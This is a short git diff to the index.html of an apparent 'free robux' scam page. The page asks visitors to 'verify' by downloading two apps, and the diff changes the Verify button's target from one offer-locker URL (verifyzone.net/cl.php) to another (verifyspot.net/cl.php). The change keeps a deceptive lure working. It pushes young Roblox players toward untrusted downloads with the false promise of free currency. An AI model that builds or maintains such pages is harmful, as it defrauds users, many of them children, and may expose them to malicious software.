--- a/index.html
+++ b/index.html
@@ -66,7 +66,7 @@
 	       <br>To start the Transfer of robux on your Roblox account, simply complete the verification below by Choosing Two Apps and Download them!
  	<br>
           </ol>
-          <a href="https://www.verifyzone.net/cl.php?id=5a0db212ccd1fb3a46e9e2333fac2a06" target="blank" ><button class="btn-standard verifyBtn">Verify! </button></a>
+          <a href="https://www.verifyspot.net/cl.php?id=5a0db212ccd1fb3a46e9e2333fac2a06" target="blank" ><button class="btn-standard verifyBtn">Verify! </button></a>
 	      </div>
 	    </div>
 	  </div>
